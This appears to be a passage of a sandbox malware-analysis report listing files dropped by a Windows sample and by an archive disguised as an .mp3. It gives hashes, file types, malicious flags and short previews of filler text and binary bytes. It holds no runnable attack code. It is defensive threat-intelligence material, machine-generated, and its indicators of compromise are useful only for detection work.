                                              MD5:25B3D4F1279923FD4780981605BCE9FB
                                              SHA1:12257BD64A5AB12EAFD4679BDBDF9BCF2903B160
                                              SHA-256:DF4F76D702170095FA752D69F1AB793604E9DCCE7ADCAD7C83FDAE623F0C0093
                                              SHA-512:F3579A94EBABD59B055D7170E3F9FBAEC7D645E3CBE0EFF514413621FEC6811FB07264E4A5048222E8A84BDEB671D7580989B7E2D6B8987795782B4C7C7E9920
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):586
                                              Entropy (8bit):5.585544499923843
                                              Encrypted:false
                                              SSDEEP:12:SCsCEhjB3FzAduE13Ozk0L4d3VNXINdzzPXbWWC6pZBPc:7sCwjB3addBOQgSFNXUeWCUZO
                                              MD5:AC53EE172CC20F1BC979FD4710CBFA00
                                              SHA1:5C83524E42270883FF05C434F3AB62ADA8931F51
                                              SHA-256:774C4CC458E33020B29FA28FC91DB540C86F55142D716CA1613DA20670435198
                                              SHA-512:70DF2BFE2300AAE5BEC804E7F0235C1B9601FC1447DF84248B6EFF030A4F36B908D00D089911D082C7CA10F7F9D30239B1414B754B32CB1ADC8F8A5A7286341D
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):588
                                              Entropy (8bit):5.744612228806984
                                              Encrypted:false
                                              SSDEEP:12:WnGNeRd/MUAwEhQmHIFFg33etq6gFodFgSRRhkbkNkt7HLzYmv:WGuNW3F6gKdbRhkANo7LFv
                                              MD5:62A55B40D10BC4CCDF643E624B90D003
                                              SHA1:1AAFD527E1B40B555B1E68E1F6D9F6C594586913
                                              SHA-256:9401C3D0CBD1FBB5FB740EA9EFF7B4F7AF764574A6CBC487C97F99F610BA9852
                                              SHA-512:421B3694A2F2E080A03459973FE05A2B23F4FA67323529EE8D9AFDB6B5E9B8D082193A31F7C2B58D3368158FCDEF49D60DBABD3A4F7E656C8ED5B3B95F6BB181
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                              Category:dropped
                                              Size (bytes):1373192
                                              Entropy (8bit):4.041168214657541
                                              Encrypted:false
                                              SSDEEP:24576:T3AoJ3FFp2KHP5jD69JE4N325yEqwGxRtsb+r:LACYDNf1F
                                              MD5:35A5CC0E4D021890E72A070EE02DFDC4
                                              SHA1:BA20DE52CDC21E3D8BD69470381B7D0CB53F1D05
                                              SHA-256:51E725C19B88D14E3D978B54D810398993242C959145F323FDE92CFA55557ADA
                                              SHA-512:AFE5510B3A27CF5E308CDE1E000289777AB9CFD592052B37C990028F51F4D5113E15FCCF7B13CF9A13ED06E3D134ED2009BBD18DDD5B508FA20D050D8D2719C2
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):579
                                              Entropy (8bit):5.575049796233503
                                              Encrypted:false
                                              SSDEEP:12:SgIrV55RKAnZROwTEeZUCeyNsLrkW6GLr1uQRTPUUD2EdZ:SgAVJKAnvOmUCXW63x0dZ
                                              MD5:E3C40D261A890A50E8616EFBCE725DF6
                                              SHA1:51087DD64E5C3F673C47A3B03CCAFFADB77DCE6D
                                              SHA-256:A1C8B7A1408638A385956EDAAF4EC1DEFB98E94784A5AEAEC9F63FD24CF3F83B
                                              SHA-512:114DE87085139632A912F2BDC2700EB60F166623641C460E818CE7A29EDC2DAC24F9C01B186CFB268976B7605FE496ADDB4300E6EC20507B101659DF2ADD69F8
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):512
                                              Entropy (8bit):5.547696645967649
                                              Encrypted:false
                                              SSDEEP:12:EBPfOBVX8y2PB4kT4DrgUyYSb2ElZhbuQ7+UNjTpP7:EpyXj2PG64zyfqEtbum+GjTp
                                              MD5:C4CEA733EF0F8C84E8C7081CDCB01B5E
                                              SHA1:66050A0F1A5C5A17532E8D449573A31BE8E8C693
                                              SHA-256:B75166289CC3ACD2E7ECB722F91792CEAD7BCCBE5D230A3AAF211C2027F7E8B4
                                              SHA-512:013A885C743CAE8BC941D76374745D18498CF5F53AEB7C4E02232130A552CC1553C2D3051D85B0494033DA2F5367BA078333659823A7AC236254420EEA0706DA
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):562
                                              Entropy (8bit):5.564214025056381
                                              Encrypted:false
                                              SSDEEP:12:pkxSfmKryTM4h6LyEeTNKjGbrGh9VAfwv:pk2mK2TM4oLyEeTgjG3Gh3Afwv
                                              MD5:4C854C21A4E83906AF7AE0B83D1D797B
                                              SHA1:52A423C95344186D45C66780CD55890820E755E0
                                              SHA-256:613C53A8E742366747A9253DD19FAB2527258F08E40699AAAB85D920787A717B
                                              SHA-512:BFEA86080CFFEC1E69EC7F5A1371796A656B8A129A1FEF437FADC8D170CDFD07C6F1BA514FCD14A138D943D89E26621686C366592D9BF6890C83C22A0EFA1963
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):648
                                              Entropy (8bit):5.642286506031062
                                              Encrypted:false
                                              SSDEEP:12:2y3xfr0t79gqcHuINsJMOrkGgOn1BBaS5GxEu7Femjt/tON9v:v3xfY79gqcHuINsLfgaNGx4m29v
                                              MD5:135F39E327B474DFCF9139F5A9DE5A9B
                                              SHA1:0D70AFD4762C1296355DD9E7579EB57B833D4C0C
                                              SHA-256:0988FF10C9F291F32009CA04929C0156A0E10C5003D30AE266B865E56C064B17
                                              SHA-512:4CD5747C41EF013C5CC884536864C35C45BEEB3FBB794CA6CD891C1F787ACE6A261A0B2E45BBC87677CF6540E5413564D98C2510EE30EC163E8EE3D0E4863E2B
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):633
                                              Entropy (8bit):5.515639729376305
                                              Encrypted:false
                                              SSDEEP:12:Zl70KyLGUkXx+LCaXWKbjy6MGdqNomuLutX/1iBPR6FoCWLqywLHQcs2:gKyLGdX+DXZy6MGdmomuLuJ1ijyWLBM
                                              MD5:0E969295487775DAA7D03B33829684F8
                                              SHA1:613CF0518A258CE3ED5BB2AAC7BAC1FDA71B1EC4
                                              SHA-256:5BADEFDF6C9490D5ED3A5181BB87A30536776827BF7A155957C62B01028FD4FB
                                              SHA-512:7EFCFCEE6E15AF372A6A57F66531FEB1C1873DC22399CE05228369EE3E7E49D69453D75D78131D50217761539BFCE82245140163C50ABAFA1790EEC69F1665E1
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):947288
                                              Entropy (8bit):6.629681466265794
                                              Encrypted:false
                                              SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                              MD5:0ADB9B817F1DF7807576C2D7068DD931
                                              SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                              SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                              SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: FS04dlvJrq.exe, Detection: malicious
                                              • Filename: M1Y6kc9FpE.exe, Detection: malicious
                                              • Filename: mJIvCBk5vF.exe, Detection: malicious
                                              • Filename: lcbF0sywlU.exe, Detection: malicious
                                              • Filename: 1aG5DoOsAW.exe, Detection: malicious
                                              • Filename: Factura-2410-CFDI.bat, Detection: malicious
                                              • Filename: DGFmCcZnM0.exe, Detection: malicious
                                              • Filename: qZkywW6Q0b.exe, Detection: malicious
                                              • Filename: AlBXxWizEX.msi, Detection: malicious
                                              • Filename: mEudzoO1bG.exe, Detection: malicious
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):947288
                                              Entropy (8bit):6.629681466265794
                                              Encrypted:false
                                              SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                              MD5:0ADB9B817F1DF7807576C2D7068DD931
                                              SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                              SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                              SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with very long lines (392), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):90504
                                              Entropy (8bit):3.021449759435307
                                              Encrypted:false
                                              SSDEEP:24:QRMMMMMMMMMMMUYeeeeeeeeeeeeeeeeeeeeeeeeeaYdddddddddddddddddddddJ:bHXI7WPxVcWVWC9EnIhnrQ
                                              MD5:BE932D231EF60DCF6AD6C579873B550C
                                              SHA1:CA37AE517C7D341E008CBD71BEAB29ACA839002C
                                              SHA-256:D47ED1047E043162E221D1A21B5E19D8A24641442BCB17C6C8A51F9456998751
                                              SHA-512:21385ADA5436112899AAA4651A6D561499735E6E59674258C9DE6B38A50E671276AE9E8B5C7F70E60321CF41846AE34E299D179FBF6226027D9A9C99751AD09B
                                              Malicious:true
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):609
                                              Entropy (8bit):5.517312307798012
                                              Encrypted:false
                                              SSDEEP:12:UIVldnzxwXVoUbApRq1RfoSbdLjPlruYpdMQ2DuyX4Ozjc:UIVrzArKSRjbdLpruYp6LVXhc
                                              MD5:834D7436B1908047FBC4801E3D9EA735
                                              SHA1:8CC6441F6A4A65902AE20C8D0D73A59048227253
                                              SHA-256:056D4C251DE76715737124CCB63E6652840EE3EE66A41F45B109B3F413EE864B
                                              SHA-512:EFFC86EF8949E1C231F9C18C807AFC39882CAFA2BEB5E87F10E2AC5D8378D2F2AC3C94679EEFCFE9F4AF6C260E524BAC051FC789D147215CCD552A1D44EDAE7A
                                              Malicious:false
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):113665448
                                              Entropy (8bit):6.924457735552897
                                              Encrypted:false
                                              SSDEEP:196608:Gt8gSuolgztogeon51s+rCBTHJVUdOHtBJagqthtgE/zBACLTxLun176fzoEh+To:M
                                              MD5:BD375FCAB430AB12BBE70CFFB392EE88
                                              SHA1:E7E5B1703F84C7ECF79E1F2F0F425FC084F1D215
                                              SHA-256:DE5DC11F91E1F382D44EA0CFD15983680CD2A9239882672C003EB7DA281F5218
                                              SHA-512:EAE4BF46DF8BEA8F9B0C4E028BDE510AFBB12A9BFB9709E5271848D4C9AB38879B987F6DCABE4B0DE7536A481F368A2EF516295C443BAEAAE8E3C2780C9C9F30
                                              Malicious:false
                                              Preview:..;.$...bp....u.w ..... .kJ....Q]Du.........e..~7....!}{%.9.k.X...j..ke.....J*b.+(<. N-dP1...E7........0............g..p...".l....`..b.|.b....MEZQ....(iyh}...P...?........+..-._k.?..T.....z..'.m.. ....#.c.s.-`.&..V..p...u#.$P....e..DF....W...w.j.O._.-....u= .....IA^.z....sl....&....o....Yp..E....1..2.hd~Bv....{.Xe...n.?.mMp|.c=.....Z}[by..]/..H...K.....k.r....n.3.g.b.6.4.w.B.4.8.0.3.7.X.O.5.n.9.0.i.6.5.g.8.r.2.d.J.2.....l.2.Q.8.l.H.0.L.....,...x.0]t..E.....m...1?h.o..!.>.R..m....X...4C..U..i....p#"....<@....wI.y.^j..}E....:A..X4..{Q...>...I...bI]a ...f..'...%...!.......t.RJm(.o.68.......J~.~o.x/}.E...v.....k.6.B.2.g.L.3.3.1.0.w.o.....X.t.6.Q.V.C.5.4.T.7.2.s.5.r.5.9.v.0.4.H.q.3.z.A.h.r.4.o.2.S.W.G.O.Z.M.5.F.L.e.6.m.K.1.3.N.W.k.8.....j.y.c.P.7.6.6.b.5.9.x.d.0.P.1.k.6.8.f.r.h.v.4.8.t.5.p.L.i.G.3.....m.6.4.W.9.2.....9.8.4.2.X.U.Y.0.5.4.4.2.9.C.5.W.3.U.9.6.2.X.j.e.C.r.Z.1.Y.T.9.3.k.....b.8.4.E.9.e.9......L..b..`..n...zh.jQ.3.^..<bDS.0../5.m..:|..)..Ja.5r.,.../
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):41169
                                              Entropy (8bit):5.574992140650956
                                              Encrypted:false
                                              SSDEEP:768:SqzHu71BxiT+rwNwh5KG/KKQs2TUdeDPz6YzTwnuO+YZk7IZ:NHU1rstNrGiKQRT9DL6DuOP9
                                              MD5:5FE3C2E677E90B8971DCAEC9D9CF973D
                                              SHA1:CCCEFD97B61B17F2BC60983D2437925A7B063B20
                                              SHA-256:762982A2B57B2A93DD63FBF230DA414B6C3ABC6240D4B0AF7BB940DC81B74512
                                              SHA-512:2C204731CC1BDB18259E737CDCE622833367413BF10A75A73E23D3C531E3739093D0E4227C032AAB61EA8F26A8D65175AC3072EAF61116FF07BC623E0D402727
                                              Malicious:false
                                              Preview:Gs8k9G..09Dze2Ri21v07024j3Bkj08k43620w..as6F9u248nt4E5D34X8TicUo56G1p6Iq7HWQ6CO543yP0E..xaJjJ6998evt364K2JMk3JUL1V169d17W1525g8u64Q8mg624Dq69u..RwDHspQjqT7082C211yji23005131f84T0V4Rt783H5qN..71503293t47A3715b4GE0K1n2HSP78l25n49k2qOp668h89L439GV76rXE63A660vI238..VPtgmDkG5IY651h2xX92d3O72m544t7j6KbS3789u3..8juXPy4HfT34a96W79i4L635wQN7C64m0fV5Q6G83u2Dsd..phmvnO5wH7bw707x270573Yr30Iaqb8Z3ornK7..Sk69g85nW3urpi71T05z02880K89onK84T33dy93ziqP..4J937x4E606vqL7fKZg2G8uTA2f20g8z8N7j58097O6w98030D1O8RN9S..Mnh8Sb8x5UW0x4M26I8f394Z8..9A9cur15YeDDM5O8G3A7rDs4949a4k9RYF76v99K..SM6gUf3u8v64W2N889l16N5arA6z268E1Y8T6c8b27d42d29S6i..S8whuJPCVO3N3Fm05JeGtD4M..l1p19Kskx87icmQeA2umK9E66LU8j87e320208152Hk75O7B1OP9UU22..t602Dct2yRctvCMtZyp4kn25XRJ0qH921b0r67t..4940R0K3j25Z941pc385q1bKK31ajV75rr6v905G4b497939SDz6k961po13O70z0..gu0QN79T640hn842q969k980Qe8i3k78137xBT5QI4x94G..u8u2ItTd0afA0F0T8lk38J1Eu5W1867To0PF8V8466vS13..Lc5l4blEH80kJtCcncqb3G3r12116x544DE59gG1Z0gR055nei3um11eU6x48Y..n62F5C0l6GM181230H77R8364N7
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):517
                                              Entropy (8bit):5.60876413392208
                                              Encrypted:false
                                              SSDEEP:12:g3tc6T0er7S8x1pbJ5+HB+PteGsoregI5v:sTNr7S8rpbJdPtWg8v
                                              MD5:4DAA3E600C4D2C162FFE78C5DF68AB8E
                                              SHA1:C1F052EB1577599B89B70AE99BD9E6C8DDE4F822
                                              SHA-256:C2B1869137E2E69E3969C50A0918EB71C5797F84FAF4093AEF0C890957A193EA
                                              SHA-512:35C537693DF896C6B62118BD38BBDC6C0B4233C391FA11FEC0E49373E08E7BAEDC9FAB07489BC9C55D7D69797820AEFC6C21C62B5A8669EE8AEF297DBF89ED6F
                                              Malicious:false
                                              Preview:94fl4Vi93m506967tqUkd2rq80v81m3D5T71v6B8JtB12z46779Q7o7M6EGvF4uJWM5dt4i62H71S43T9575xR5xP644ye..ToolbarConstants ToolbarConstants..59s492Ipmlntg9c0WuAa6yOc2fLAUFHlRtlbYoa..FileConstants ToolbarConstants..863Zy4EYs568DAWVZ2uH3890igu5Y361H1Y8v4o929lSB6556M2yTP3o342t8721N0H6p5nw5959eA2..GuiDateTimePicker StructureConstants..c64xycev244ZQqU4x410L5X6rVO617q4C7z3K7gB5k81h3g4sx2HPo2VDBj113h748313BS7G7jI8bt315ob95142G2g09z0..StructureConstants ToolTipConstants..QV0HiRFd3ZDK9227R86G6WQ..ComboConstants GuiDateTimePicker..
                                              Process:C:\Users\user\Desktop\ngPebbPhbp.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):507
                                              Entropy (8bit):5.6090252322037335
                                              Encrypted:false
                                              SSDEEP:12:B0SXXoGYepQld6qJM7hBfZJyCv6jMJoDbGPWqJ5QEWz:JlYQyd6WM7BJzS4mbtq5uz
                                              MD5:992C91B45A9F3472868D47E61CB8675E
                                              SHA1:FCDFBC8EC428982B4CB0B09FB00244DE0BC78073
                                              SHA-256:A8A5116542D33261544E18C4431C11A45F77AB24A7F06A2C1D06480066EC6E62
                                              SHA-512:24054844512035AB6962F3ABE2DA36D56AC7E182A72A19D8A38F1C356D7BDE30F14FE6FE3EF057C602A73E53A5D9131676C01F1EF99B545877015A4D3243B9EB
                                              Malicious:false
                                              Preview:8u945m2142LJ65a6So7R8t5st6601672XsVFQib88SnLg9143011331K3RuSbm3..GuiDateTimePicker StructureConstants..mSs378DDJFLCg18436734Q4owR926424B2q2EexiB..DateTimeConstants GuiDateTimePicker..9ZD6F6qLj9L01K0Z904p58I62uwhO5xE78414y9z074U1i4TxBRJtk1ak3qC223u0A74u83jKy0t..ToolbarConstants ToolbarConstants..vhhqME9L023D54yNN5374t7676B88B69DrU6uipg1csk9mRX436188452v88a57mqh5Yv930203v1bX00p630uz9NMO0qrg22OfJjm0qX53kIgVl4B343Q4xd7GM8R741352Bxng4HWRbY8r1swz4E5hE74167uHr3R13on315KY89..UpDownConstants DateTimeConstants..
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:modified
                                              Size (bytes):45984
                                              Entropy (8bit):6.16795797263964
                                              Encrypted:false
                                              SSDEEP:768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
                                              MD5:9D352BC46709F0CB5EC974633A0C3C94
                                              SHA1:1969771B2F022F9A86D77AC4D4D239BECDF08D07
                                              SHA-256:2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
                                              SHA-512:13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):508
                                              Entropy (8bit):5.479727752033359
                                              Encrypted:false
                                              SSDEEP:6:8RrGdDpW9J7mwnTXTJ+VmSgRTcG7VA+UCduyBrgWDgRi8Ty8Mu2C/B2azVWmUOQ8:Aq/SRLTmgZ7VzwODJPlCbUOQH8raBPc
                                              MD5:D391F8B614A342CFF9FCBF8F4E41C934
                                              SHA1:FC045F44973B9000F63808ABD1E59C66ED6755B7
                                              SHA-256:36568784A413D46056FAC31E259C41F4429F08B1564A72CEB777CC80A0AA9F1C
                                              SHA-512:E446D6F17E9765AC260F4BD429FFE901C47C46FDFDEFBA25269A33E570E98B24469B529B815322E1D17AE3B4589ECF5561519D39D3AD65FD164AA8FCA50E62AD
                                              Malicious:false
                                              Preview:13Q6zh847S45g6A2cH4mv6Q5W144vY6AH5972d938UTIk14EI5eC1H550y7Cq0TRD695T643diC189ozNoeMqD..ComboConstants ButtonConstants..n6812ly6QM661R2U13FDXSNeD1jFG4iHq7Y5m11P8Db0mX7i2ven5Jon68h1352y93b5NS4r9g888993..BorderConstants ComboConstants..458354d8u104IpZoH294M7s4Z0DZtF926l050IX5avG2A1393kp7Y061DD02T..FileConstants FileConstants..6q4s927yPeasW75NX2gP090wT809FH21p95sDCV794v13oNY1g2p37wUi33c6r3alyp9KL1e505x1a6P6Z57R9K2395..BorderConstants UpDownConstants..5zN094t11829G6o89k..ToolbarConstants TreeViewConstants..
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):624
                                              Entropy (8bit):5.578995690653875
                                              Encrypted:false
                                              SSDEEP:6:px8jxX+dkaEJNur4UiHGVI8o/KU0L6cW2N/Aykx4SVc9m5CQFXiKUn0Htwdl7h4c:qxudC+CGVI5/KUbR2N/A75CQJjrNCgWd
                                              MD5:C3A02FE4F358078606A02B7D8C069957
                                              SHA1:4CB6FC80AC829FCDB8088CC95F6C109C719CFA5D
                                              SHA-256:D8ABE1326E449CA4D9C330A900CE393EE32101793D91E7F556D0C87E77ADBA0C
                                              SHA-512:C016DED65E5A728E3EFF1E66AE913FF81677B197B4C809A9F9E509304DC2747A581597760B0D4B79E60C03647DC3569CAE21C413152C6E4AF8B4DEDE10E8BB9D
                                              Malicious:false
                                              Preview:834DOh7Je661F2c5x2Ow20Ja7vU6NFcv5O02Ac2g0I27x85247oNwN2Zi6qTh913b97CO8B45CTs2f6P9Jl55NY2Zk7P4198N0K72908qD93JeQY9n3KRM9fI868cBg24c37a2w9..ToolTipConstants BorderConstants..9n7i1Z394y14OPSW5z977v19g556Ma3788W72Tl033r8Kc2g2csp145u9b4F1d802Vi1K5XaE6..ColorConstants StructureConstants..8362kXs3l3Kr9a6pxh7DV33..BorderConstants ComboConstants..LTz071752Mo7Q622F9jiN505B91QV82i5ZM1nQI4ThM10Kp33sQKfaS981S03NI2T404E5s4x02A1sR7ND4RW3A04vr7BJgl656706yg..ColorConstants ToolTipConstants..jb1ii7Kqv193B38S1Wq1R69h75b249507B84260hB8RocdDQh7590K1Uk0x1yj2o21Yw9c6jp4196lPD3ZdB1i75w00dGmZUhsWKnO50N70TL0..FileConstants DateTimeConstants..
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):528
                                              Entropy (8bit):5.506196921189518
                                              Encrypted:false
                                              SSDEEP:12:Df7UTwPck1UAJeu31tWxpeo2plPx2CnDcJjojWd9E:DfArk1UAIuFAI5vzr
                                              MD5:83CA8D8BAC38AF12453F9D9FF1D02916
                                              SHA1:DCC6E7AB9858EB9FF63F4CD2DD7E9B84EC694A22
                                              SHA-256:58412D427987A11C362FC7D921804F58277C3A5E4EA7CE98D4DC260E9AEB6302
                                              SHA-512:1BF89F1196B9C41E5781F118CE657AEC2194D48B0C4D15672A55093778C660E609626A9E5EA5336064590A9BD21F8FA1D9CF6F6435E866A0FACF50E438D5D3F0
                                              Malicious:false
                                              Preview:82JG78W49Z6rBhKeP0LfTp7Xg28VhFf1aX0x6U070h1vC5j0r92Mi7..TreeViewConstants ColorConstants..z1SEK6fEtUM9F8cG9454759C0O4w2ypt1Bb28qtf5dFm0xi230wVx34u87fLZ00..ButtonConstants DateTimeConstants..817kA2766727tzg7f17Sa1..BorderConstants ToolbarConstants..j9A6k74SGiH01aU7N3U2..ColorConstants GuiDateTimePicker..SzR70D8525Q9257Q2U49Z7P2QW929HN1tQ99j8W400524C26OKd870rIAA0SAz16c803..BorderConstants ColorConstants..es923584X949Y6Uc07114kQ4U9aVC8FdE208gU7E7X2b5m0F047i69SUX793Fmj038bp52boo6070BLW1j5987I..DateTimeConstants FileConstants..
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):532
                                              Entropy (8bit):5.614408649531123
                                              Encrypted:false
                                              SSDEEP:12:RV3ATUo9lbTfylFQkoQPvXXaBPx/EB+CGVRsXoGo0ciVI:6FgVPPqTSkaoRj
                                              MD5:8344337D8607EEF8BA26FC751F8E0122
                                              SHA1:2AB2AFCE50E3553637AEC0B5A65AA2E72D0CE51A
                                              SHA-256:ECB2D582D697D033A5E5BD06387DF5725AF74707C0E4B596D564BE2BDB1221A7
                                              SHA-512:DA3CAB35922C97D3D03C073F51915792278919775C9690AD95A8BD7143CD45A5B0FCBB5216ED53DFC3EEE1265BB91DDCDD875699AB23B3D95FCCC991190CAF2B
                                              Malicious:false
                                              Preview:V31181L127945gJ1Uws83220u59cr2f5dSML361TJdCh3lS6Wh34497f07h20652z7N867yP02D068ASQ537P97O834tRqR3X55368IUP233E78g4Cdj86r1y31kNuM1209o00aA3D340Sk8VFE2ezk338jo8021AB2UjCm2p5..TreeViewConstants ToolTipConstants..1id391JT5g3Rpna5g2p2OW4495v3G312zf5d8Ov157464n01cn1T598s2JXMoG3x46r0aJMP4eKnM66..GuiDateTimePicker ToolTipConstants..0K7884RIuoz0898H2I9P3V22r7V048De5H47M6eG3AaI5r8R3BuqXj7Zm5zlNq56eC6Y893A83e0mW6JM01W9w2ZcuDjbO8548qpM85y3Dj92QNzT5GAM3Qdj1T1SiS19qB3k37Z0g0v849w4sK82br5V629b2y5A290v63O1q0h..UpDownConstants UpDownConstants..
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):609
                                              Entropy (8bit):5.593001882864648
                                              Encrypted:false
                                              SSDEEP:12:zMySb9uAA0s7OThyH8QiRiYSDwHNGDJnwLo5Q0VynLv:At9uX0s7OtOxwHNcJwx0V0b
                                              MD5:73CDC398766B26D5B3FC2A732B633E80
                                              SHA1:4E8178167362C791D19B8DD90284751E6294C041
                                              SHA-256:D078345688738BC731EE73004AC6AD2670CFD6343B570FA5B7C0AB7AD30F0B48
                                              SHA-512:AB55CECF628450EE0E07591C8A6B7E1EBD6F1E1FF0C3184A14BF297C64153C8507B331A391020A5068D7C23CB55E73125E7582D204CE6F5C1E26F3EE3CD32705
                                              Malicious:false
                                              Preview:3li0Xn8t8B6x42r4GbotIM1C1yN0dew5wV9653qpJmgzHW31n4u75RwF0qJPo51l0zyo7ayqW365qsyy00UWUD0mn48038gP14kT9JNM72656Hiv3d5243B5thSNh45FXT82wo37B1r77Ty3m0354RZI71Jio01ZxyUlF582x6889t76NN7R74YD..FileConstants ComboConstants..5I641lHUk1155oKBDOSFb2cZ011r365L898vayymH47s2wZ083U25oF8X3227zT28y4V8JVILGUH31t024129nX5f5mMo4l04jJ5F39p63X0JlfbXut9..ComboConstants ColorConstants..5ZC2164T791T238XuQ4h0..ButtonConstants ToolbarConstants..TNfhG54lK22bJQSg20foWy2Xqo76K5b7932RRN3i8rK2KEl4j576w706v0sLAr6984Of40XjH5nI0Z29l8C7h5b89b613e4rFzwf014u0285impoH34vX335U92KFxCx097k2x6O576rcz73NP63cB..DateTimeConstants UpDownConstants..
                                              Process:C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):522
                                              Entropy (8bit):5.512682217978687
                                              Encrypted:false
                                              SSDEEP:12:aaf22j3HmimBHSZxVelxyBt7hYNyWcXGbZ3cwRr:A2LhmBexcfStQyBor
                                              MD5:25B3D4F1279923FD4780981605BCE9FB
                                              SHA1:12257BD64A5AB12EAFD4679BDBDF9BCF2903B160
                                              SHA-256:DF4F76D702170095FA752D69F1AB793604E9DCCE7ADCAD7C83FDAE623F0C0093
                                              SHA-512:F3579A94EBABD59B055D7170E3F9FBAEC7D645E3CBE0EFF514413621FEC6811FB07264E4A5048222E8A84BDEB671D7580989B7E2D6B8987795782B4C7C7E9920
                                              Malicious:false
